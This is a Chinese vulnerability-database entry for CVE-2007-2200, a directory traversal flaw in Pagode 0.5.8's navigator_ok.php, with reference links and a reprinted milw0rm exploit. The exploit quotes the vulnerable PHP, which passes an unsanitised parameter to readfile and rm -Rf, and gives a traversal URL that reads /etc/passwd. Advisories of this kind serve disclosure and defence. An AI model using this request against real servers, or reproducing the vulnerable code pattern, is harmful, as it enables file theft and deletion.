Pagode Navigator_ok.PHP 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112775 漏洞类型 路径遍历
发布时间 2007-04-23 更新时间 2007-04-25
CVE编号 CVE-2007-2200 CNNVD-ID CNNVD-200704-455
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3783
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-455
|漏洞详情
Pagode的navigator/navigator_ok.php中存在目录遍历漏洞。远程攻击者可以借助asolute参数(设置为..)读取和可能删除任意文件。
|漏洞EXP
# Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
# D.Script:http://belnet.dl.sourceforge.net/sourceforge/pagode/pagode-0.5.8.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /navigator/navigator_ok.php: 
###################/navigator/navigator_ok.php###################
#  <?
#  	session_cache_limiter('none');
#	session_start();
#	include ('../includes/functions.php');
#
#	header("Content-Type: application/save-as");
#	header("Content-Length: $file_size");
#	header("Content-Disposition: attachment; filename=$file_name");
#	header("Content-Transfer-Encoding: binary");
#	readfile($asolute); <----[+]
#	exec("rm -Rf $asolute");
#  ?>
#################################################################
# Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020

# milw0rm.com [2007-04-23]
|参考资料

来源:MILW0RM
名称:3783
链接:http://www.milw0rm.com/exploits/3783
来源:OSVDB
名称:35312
链接:http://osvdb.org/35312
来源:OSVDB
名称:35311
链接:http://osvdb.org/35311
来源:XF
名称:pagode-navigatorok-directory-traversal(33848)
链接:http://xforce.iss.net/xforce/xfdb/33848
来源:BID
名称:23617
链接:http://www.securityfocus.com/bid/23617
来源:VUPEN
名称:ADV-2007-1512
链接:http://www.frsirt.com/english/advisories/2007/1512
来源:SECUNIA
名称:24992
链接:http://secunia.com/advisories/24992